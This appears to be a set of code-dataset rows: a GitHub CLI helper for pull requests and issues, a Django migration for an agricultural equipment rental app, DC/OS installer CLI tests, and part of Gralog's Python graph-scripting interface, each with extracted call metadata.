ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| [((102, 21, 102, 56), 'json.loads', 'json.loads', ({(102, 32, 102, 55): "os.environ['GHUB_CRED']"}, {}), "(os.environ['GHUB_CRED'])", False, 'import json\n'), ((110, 8, 110, 42), 'webbrowser.open', 'webbrowser.open', ({(110, 24, 110, 41): 'authorization_url'}, {}), '(authorization_url)', False, 'import webbrowser\n'), ((130, 8, 130, 38), 'json.dump', 'json.dump', ({(130, 18, 130, 26): 'response', (130, 28, 130, 37): 'data_file'}, {}), '(response, data_file)', False, 'import json\n'), ((132, 8, 132, 82), 'os.chmod', 'os.chmod', ({(132, 17, 132, 52): '(ghub.data_path / ghub.auth_filename)', (132, 54, 132, 81): '(stat.S_IRUSR | stat.S_IWUSR)'}, {}), '(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)', False, 'import os\n'), ((321, 8, 321, 63), 'git.Repo.clone_from', 'Repo.clone_from', ({(321, 24, 321, 57): "('https://github.com/' + repo_name)", (321, 59, 321, 62): 'dir'}, {}), "('https://github.com/' + repo_name, dir)", False, 'from git import Repo\n'), ((106, 11, 106, 62), 'os.path.isfile', 'os.path.isfile', ({(106, 26, 106, 61): '(ghub.data_path / ghub.auth_filename)'}, {}), '(ghub.data_path / ghub.auth_filename)', False, 'import os\n'), ((127, 15, 127, 44), 'os.path.isdir', 'os.path.isdir', ({(127, 29, 127, 43): 'ghub.data_path'}, {}), '(ghub.data_path)', False, 'import os\n'), ((128, 12, 128, 39), 'os.makedirs', 'os.makedirs', ({(128, 24, 128, 38): 'ghub.data_path'}, {}), '(ghub.data_path)', False, 'import os\n'), ((318, 14, 318, 37), 'os.path.expanduser', 'os.path.expanduser', ({(318, 33, 318, 36): '"""~"""'}, {}), "('~')", False, 'import os\n'), ((126, 12, 126, 23), 'sys.exit', 'sys.exit', ({(126, 21, 126, 22): '(1)'}, {}), '(1)', False, 'import sys\n')] |
fagrimacs/fagrimacs_production | equipments/migrations/0001_initial.py | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. John Deere 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
                ('hydraulic_capacity', models.CharField(help_text='Use SI units of gpm or psi', max_length=100, verbose_name='Hydraulic capacity (gallons per minute (gpm) or psi - pounds per square inch)')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
                ('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('harvesting/post-harvesting', 'Harvesting/Post-Harvesting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What farming service(s) do you offer?')),
                ('agree_terms', models.BooleanField(default=False, verbose_name='Do you accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
                ('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What hydraulic capacity is required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
                ('agree_terms', models.BooleanField(default=False, verbose_name='Do you accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [((14, 8, 14, 65), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', ({(14, 40, 14, 64): 'settings.AUTH_USER_MODEL'}, {}), '(settings.AUTH_USER_MODEL)', False, 'from django.db import migrations, models\n'), ((21, 23, 21, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((22, 25, 22, 232), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((28, 23, 28, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((29, 25, 29, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((30, 26, 30, 76), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((39, 23, 39, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((40, 26, 40, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((46, 23, 46, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((47, 25, 47, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((48, 26, 48, 73), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((57, 23, 57, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((58, 28, 58, 67), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((59, 29, 59, 64), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((60, 31, 60, 212), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((61, 25, 61, 130), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((62, 41, 62, 251), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((63, 30, 63, 103), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((64, 31, 64, 105), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((65, 27, 65, 97), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((66, 39, 66, 205), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((67, 37, 67, 235), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((68, 24, 68, 91), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((69, 40, 69, 125), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((70, 37, 70, 128), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((71, 36, 71, 226), 
'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((72, 29, 72, 107), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((73, 25, 73, 193), 'django.db.models.FileField', 'models.FileField', (), '', False, 'from django.db import migrations, models\n'), ((74, 39, 74, 105), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((75, 31, 75, 110), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((76, 34, 76, 107), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((78, 32, 78, 123), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((79, 27, 79, 138), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((81, 25, 81, 116), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((87, 23, 87, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((88, 25, 88, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((89, 29, 89, 126), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((98, 23, 98, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((99, 28, 99, 67), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((100, 29, 100, 64), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((101, 25, 101, 98), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((102, 26, 102, 123), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((103, 27, 103, 122), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((104, 35, 104, 219), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((105, 24, 105, 111), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((106, 39, 106, 131), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((107, 29, 107, 92), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((108, 25, 108, 200), 'django.db.models.FileField', 'models.FileField', (), '', False, 'from django.db import migrations, models\n'), ((109, 39, 109, 107), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((110, 31, 110, 101), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((111, 34, 111, 107), 'django.db.models.PositiveIntegerField', 
'models.PositiveIntegerField', (), '', False, 'from django.db import migrations, models\n'), ((112, 32, 112, 123), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n'), ((113, 27, 113, 138), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((116, 25, 116, 116), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((80, 61, 80, 81), 'django.db.models.SET', 'models.SET', ({(80, 72, 80, 80): '"""others"""'}, {}), "('others')", False, 'from django.db import migrations, models\n'), ((114, 57, 114, 77), 'django.db.models.SET', 'models.SET', ({(114, 68, 114, 76): '"""others"""'}, {}), "('others')", False, 'from django.db import migrations, models\n'), ((115, 60, 115, 80), 'django.db.models.SET', 'models.SET', ({(115, 71, 115, 79): '"""others"""'}, {}), "('others')", False, 'from django.db import migrations, models\n')] |
nkhanal0/dcos | dcos_installer/test_cli.py | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | import pytest
import gen
from dcos_installer import cli
def test_default_arg_parser():
parser = cli.get_argument_parser().parse_args([])
assert parser.verbose is False
assert parser.port == 9000
assert parser.action == 'genconf'
def test_set_arg_parser():
argument_parser = cli.get_argument_parser()
def parse_args(arg_list):
return argument_parser.parse_args(arg_list)
parser = parse_args(['-v', '-p 12345'])
assert parser.verbose is True
assert parser.port == 12345
parser = parse_args(['--web'])
assert parser.action == 'web'
parser = parse_args(['--genconf'])
assert parser.action == 'genconf'
parser = parse_args(['--preflight'])
assert parser.action == 'preflight'
parser = parse_args(['--postflight'])
assert parser.action == 'postflight'
parser = parse_args(['--deploy'])
assert parser.action == 'deploy'
parser = parse_args(['--validate-config'])
assert parser.action == 'validate-config'
parser = parse_args(['--hash-password', 'foo'])
assert parser.password == 'foo'
assert parser.action == 'hash-password'
parser = parse_args(['--hash-password'])
assert parser.password is None
assert parser.action == 'hash-password'
parser = parse_args(['--set-superuser-password', 'foo'])
assert parser.password == 'foo'
assert parser.action == 'set-superuser-password'
parser = parse_args(['--set-superuser-password'])
assert parser.password is None
assert parser.action == 'set-superuser-password'
parser = parse_args(['--generate-node-upgrade-script', 'fake'])
assert parser.installed_cluster_version == 'fake'
assert parser.action == 'generate-node-upgrade-script'
# Can't do two at once
with pytest.raises(SystemExit):
parse_args(['--validate', '--hash-password', 'foo'])
def test_stringify_config():
stringify = gen.stringify_configuration
# Basic cases pass right through
assert dict() == stringify(dict())
assert {"foo": "bar"} == stringify({"foo": "bar"})
assert {"a": "b", "c": "d"} == stringify({"a": "b", "c": "d"})
# booleans are converted to lower case true / false
assert {"a": "true"} == stringify({"a": True})
assert {"a": "false"} == stringify({"a": False})
assert {"a": "b", "c": "false"} == stringify({"a": "b", "c": False})
# integers are made into strings
assert {"a": "1"} == stringify({"a": 1})
assert {"a": "4123"} == stringify({"a": 4123})
assert {"a": "b", "c": "9999"} == stringify({"a": "b", "c": 9999})
# Dict and list are converted to JSON
assert {"a": '["b"]'} == stringify({"a": ['b']})
assert {"a": '["b\\"a"]'} == stringify({"a": ['b"a']})
assert {"a": '[1]'} == stringify({"a": [1]})
assert {"a": '[1, 2, 3, 4]'} == stringify({"a": [1, 2, 3, 4]})
assert {"a": '[true, false]'} == stringify({"a": [True, False]})
assert {"a": '{"b": "c"}'} == stringify({"a": {"b": "c"}})
assert {"a": '{"b": 1}'} == stringify({"a": {"b": 1}})
assert {"a": '{"b": true}'} == stringify({"a": {"b": True}})
assert {"a": '{"b": null}'} == stringify({"a": {"b": None}})
# Random types produce an error.
with pytest.raises(Exception):
stringify({"a": set()})
# All the handled types at once
assert {
"a": "b",
"c": "true",
"d": "1",
"e": "[1]",
"f": '{"g": "h"}'
} == stringify({"a": "b", "c": True, "d": 1, "e": [1], "f": {"g": "h"}})
| [((15, 22, 15, 47), 'dcos_installer.cli.get_argument_parser', 'cli.get_argument_parser', ({}, {}), '()', False, 'from dcos_installer import cli\n'), ((56, 9, 56, 34), 'pytest.raises', 'pytest.raises', ({(56, 23, 56, 33): 'SystemExit'}, {}), '(SystemExit)', False, 'import pytest\n'), ((90, 9, 90, 33), 'pytest.raises', 'pytest.raises', ({(90, 23, 90, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((8, 13, 8, 38), 'dcos_installer.cli.get_argument_parser', 'cli.get_argument_parser', ({}, {}), '()', False, 'from dcos_installer import cli\n')] |
gralog/gralog | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | 0ab2e3137b83950cdc4e9234d4df451a22034285 | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
        if not self.sourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
        if not self.sourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
        if colorHex != -1:
            self.properties["color"] = colorHex
        elif colorRGB != -1:
            self.properties["color"] = colorRGB
        else:
            return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# What if I want to get a vertex? Should I also get all its neighbours? How about incident edges? This is all very costly and leads to the paradigm by which we just store the graph in Python.
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
    def __str__(self):
        source = self.getSource().getId()
        target = self.getTarget().getId()
        return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
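# For reference, the wire formats these helpers produce (values illustrative):
#   rgbFormatter((255, 0, 0))  ->  "rgb(255,0,0)"
#   hexFormatter("#ff0000")    ->  "hex(ff0000)"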
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
# we want a new graph
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
        # if currId is already an Edge object it is returned unchanged
        return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
    @staticmethod
    def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
